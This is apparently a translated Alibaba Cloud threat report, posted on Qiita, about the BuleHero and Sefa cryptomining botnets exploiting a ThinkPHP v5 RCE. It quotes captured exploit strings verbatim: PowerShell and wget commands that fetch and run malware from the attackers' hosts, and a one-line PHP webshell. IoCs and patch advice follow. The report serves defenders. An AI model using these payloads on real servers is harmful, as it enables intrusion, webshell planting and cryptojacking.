0
0

Delete article

Deleted articles cannot be recovered.

Draft of this article would be also deleted.

Are you sure you want to delete this article?

More than 3 years have passed since last update.

脅威の警告:複数のクリプトカレンシーマイナーのボットネットが新たなThinkPHPの脆弱性を利用した悪用を開始

Posted at

背景

ThinkPHPチームは12月10日、ThinkPHPフレームワークのコントローラに対するチェックが不十分なことに起因するリモートコード実行の脆弱性を修正するパッチを公開した。攻撃者はこの脆弱性を悪用して、悪意のあるパラメータを偽造したり、悪意のあるコードを実行したりすることができます。Alibaba Cloudのセキュリティチームは12月11日早々にこの脆弱性に関する脅威アラートを公開し、この脆弱性を悪用した最初の攻撃事例を検出したと発表し、ユーザーにこの脆弱性を修正し、これ以上の攻撃を早急に防ぐよう注意喚起した。

最近、アリババクラウドのセキュリティ研究者は、この新しいThinkPHPの脆弱性を悪用して、複数の暗号通貨マイニングボットネットが自ら伝播し始めたことを検知した。研究者たちはこれらのボットネットのトラフィックをキャプチャすることに成功しており、本書ではその活動を分析しています。

分析のハイライト:
どちらのボットネットもワームを使って伝播しています。

  1. 2つのボットネットのうちの1つのBuleHeroは、内部ネットワークを介して伝播します。

ー 1.ThinkPHPの脆弱性を持ち、インターネットにさらされているホストは、このワームに感染するリスクが高いです。
ー 2.一度感染したホストはボットネットに参加し、クリプトカレンシーのマイニングに利用されます。
ー 3.クリプトカレンシーのマイニング作業はホストのCPUリソースを消費し、日常的な活動が大幅に遅くなります。

2 . 2つ目のボットネットであるSefaは、ThinkPHPの脆弱性を利用してホストの制御を奪おうとするIoTボットネットです。

このThinkPHP v5の新たな脆弱性は非常に重大で、大きな被害をもたらす可能性があります。Alibaba Cloudのセキュリティ研究者は、より多くのボットネットがこの脆弱性を悪用して伝播すると予測しています。この記事の最後に記載されているソリューションを利用して攻撃を防ぐことを強くお勧めします。

本ブログは英語版からの翻訳です。オリジナルはこちらからご確認いただけます。一部機械翻訳を使用しております。翻訳の間違いがありましたら、ご指摘いただけると幸いです。

Blue Heroの詳細な分析

Bulehero.inというドメイン名から名付けられたBuleheroは、複数のセキュリティ脆弱性を悪用し、Windowsサーバーを制御して暗号通貨を採掘するボットネットです。

Alibaba Cloudのセキュリティチームは、BuleheroがThinkPHPのリモートコマンドを使って脆弱性攻撃を仕掛け、12月19日から伝播していることを発見した。

脆弱性を利用した悪用###

ThinkPHPの脆弱性が悪用され、悪意のあるバイナリファイルをダウンロードして実行されます。このファイルは、さらにダウンロードを開始し、モネロコインを採掘するために使用されるクリプトカレンシーマイナーを含む複数の実行ファイルをリリースします。追加の脆弱性悪用モジュールを使用して、ボットネットのワームをさらに広めています。

脆弱性の搾取方法#1
このメソッドは PowerShell コードを直接実行して、payloadに対する攻撃を開始します。

s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cmd.exe /c powershell (new-object System.Net.WebClient). DownloadFile('http://a46.bulehero.in/download.exe','C:/15.exe');start C:/15.exe

脆弱性の搾取方法#2
この方法は脆弱性を悪用して hydra.php という名前の Webshell をアップロードし、バックドアコマンドを実行した後に PowerShell コードを実行して payload1 に対して攻撃を開始することができます。

s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo ^<? php $action = $_GET['xcmd'];system($action);? ^>>hydra.php

payload2に対する攻撃を開始する。

 /hydra.php? xcmd=cmd.exe /c powershell (new-object System.Net.WebClient). DownloadFile('http://a46.bulehero.in/download.exe','C:/10.exe');start C:/10.exe

社内ネットワークへの脅威###

BuleHeroは多くの脆弱性を悪用して内部ネットワークに拡散し、企業の内部ネットワークに重大なセキュリティ脅威をもたらします。BuleHeroはローカルIPアドレスを取得し、http://2018.ip138.com/ic.asp にアクセスしてパブリックIPアドレスを取得し、C:WindowsInfusedAppePriessip.txtの下にスキャンしたIPのIPセグメントを生成します。

IPセグメントには、ローカルネットワークのセグメントB、対応するパブリックネットワークのセグメントB、ランダムに生成されたパブリックネットワークアドレスが含まれています。BuleHeroは、まずEternalBlue exploit (https://en.wikipedia.org/wiki/EternalBlue )と "ipc$"を使用して445番ポートと139番ポートに対するブルートフォース攻撃を開始した後、Webフレームワークの脆弱性を悪用して侵入を実行します。

60.png
図1:スキャンしたアドレスの生成

61.png
図2:内部ネットワークアドレスのスキャン

63.png
図3: ThinkPHP v5の脆弱性を悪用

BuleHero サイバー攻撃の動向###

Alibaba Cloudのセキュリティチームは12月19日、BuleHeroがThinkPHP v5でこの脆弱性を悪用する新たな攻撃手法を使い始めたことを発見した。この日以降、BuleHeroのネットワーク攻撃が大幅に増加しており、伝播ペースが非常に速いことがわかります。
64.png

BuleHeroが使用しているその他の脆弱性の悪用方法には、以下のようなものがあります。

−1、Tomcat PUT 任意ファイルアップロードの脆弱性 (CVE-2017-12615)
この脆弱性を利用して、FxCodeShell.jspという名前のWebshellをアップロードし、ファイルをダウンロードして実行することができます。

/FxCodeShell.jsp? wiew=FxxkMyLie1836710Aa&os=1&address=http://a46.bulehero.in/download.exe&wiew=FxxkMyLie1836710Aa&os=1&address=http://a46.bulehero.in/download.exe

2、Struts2リモートコード実行の脆弱性 (CVE-2017-5638)
3、WebLogic WLSコンポーネントのリモートコード実行の脆弱性 (CVE-2017-10271)
4、EternalBlueの脆弱性 (MS-17-010)
5、ipc$ ブルートフォース攻撃(ブルートフォース攻撃を行うための弱いパスワードを最初に使用し、次にミミカッツで権限を昇格させる

Sefaの詳細な分析#

12月25日、Alibaba Cloudは、悪名高いMirai IoTボットネットの亜種であるSefaボットネットが、ThinkPHP v5の脆弱性を悪用して広く伝播し始めたことを検知した。BuleHeroと同様に、SefaはIoTネットワークを構築してMoneroコインを採掘することに焦点を当てています。キャプチャされたSefaのサンプルは、ThinkPHP v5の脆弱性を悪用して、IoTデバイスを超えてLinuxサーバーを制御し、クリプトカレンシーを採掘するようになりました。

脆弱性を利用した悪用###

ThinkPHPの脆弱性を悪用して、コインマイニングソフトウェアMcoinをダウンロードするシェルファイルと、ワームを拡散するために使用されるランダムに生成されたIPアドレスをスキャンする攻撃モジュールsefa.x86をダウンロードして実行します。

payloadを攻撃し、悪用する:

s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=cd /tmp;wget http://205.185.113.123/ex.sh;chmod 777 ex.sh;sh ex.sh

シェルファイル:
66.png

攻撃モジュールのデコンパイル (XOR キー: 0x04)

payloadに対する攻撃を開始します:
67.png

セキュリティの推奨事項#

1、アリババクラウドのセキュリティチームは、使用しているすべてのユーザーに警告します。
ThinkPHP v5でフレームワークを最新版にアップグレードするには、できるだけ早く(v5.0.23とv5.1.31はセキュアです)、最新版にアップグレードすることをお勧めします。
2、ThinkPHP v5をすぐに最新版にアップグレードできないユーザーは、アリババクラウドのWebアプリケーションファイアウォール(WAF)を利用して、攻撃から保護し、正常な業務運営を確保することをお勧めします。
3、アリババクラウドが提供するCloud Firewallを購入したユーザーは、Cloud IPS機能の迎撃モードと仮想パッチ機能を有効にすることができます。Cloud Firewallは、先行する攻撃手法の自動保護とブロックをサポートしています。
4、さらに、マネージドセキュリティサービス(MSS)を利用して、アリババクラウドのセキュリティ専門家の協力を得て、ネットワークセキュリティを強化、最適化し、前述の攻撃からシステムを保護することができます。

IoCs#

悪質なリンク
hxxp://a46[.]bulehero[.]in/download.exe

  hxxp://a46[.]bulehero[.]in/mscteui.exe
    hxxp://a88[.]bulehero[.]in:57890/Cfg.ini
hxxp://205[.] 185[.] 113[.]123/ex.sh

hxxp://205[.] 185[.] 113[.]123/mcoin
hxxp://205[.] 185[.] 113[.]123/bins/sefa.x86
hxxp://205[.] 185[.] 113[.]123/bins/sefa.arm7
hxxp://205[.] 185[.] 113[.]123/bins/sefa.arm
hxxp://205[.] 185[.] 113[.]123/bins/sefa.arm5
hxxp://205[.] 185[.] 113[.]123/bins/sefa.arm6
hxxp://205[.] 185[.] 113[.]123/bins/sefa.m68k
hxxp://205[.] 185[.] 113[.]123/bins/sefa.mips
hxxp://205[.] 185[.] 113[.]123/bins/sefa.mpsl
hxxp://205[.] 185[.] 113[.]123/bins/sefa.ppc

悪質なファイル

File name Md5
FxCodeShell.jsp 1111888150d9451d1eccf5aedf5ff0d3
download.exe 676d5e4d5c77f51018ef4f8890c740ae
mscteui.exe 316d4f669c03abe0e361448c18ed90f8
sefa.x86 30548246f6713d4cb07be2e81b4b5886
sefa.arm7 a9b3a9c0b9aa042f993581088a3b6690
sefa.arm 9e6da964bec2eebcf31c9b9b08e81797
sefa.arm6 3b604f41cd5c381aff0ffad84ba222eb
sefa.m68k d5fca289da58ea593779d5f6441c752e
sefa.mips 84fd49036cc67ad8685392f2bcaecefb
sefa.mpsl f9ec1e53466db70714c7aa0b050290bf
sefa.ppc e202421b6610dbbe440355b8bb8d30cc

アリババクラウドは日本に2つのデータセンターを有し、世界で60を超えるアベラビリティーゾーンを有するアジア太平洋地域No.1(2019ガートナー)のクラウドインフラ事業者です。
アリババクラウドの詳細は、こちらからご覧ください。
アリババクラウドジャパン公式ページ

0
0
0

Register as a new user and use Qiita more conveniently

  1. You get articles that match your needs
  2. You can efficiently read back useful information
  3. You can use dark theme
What you can do with signing up
0
0

Delete article

Deleted articles cannot be recovered.

Draft of this article would be also deleted.

Are you sure you want to delete this article?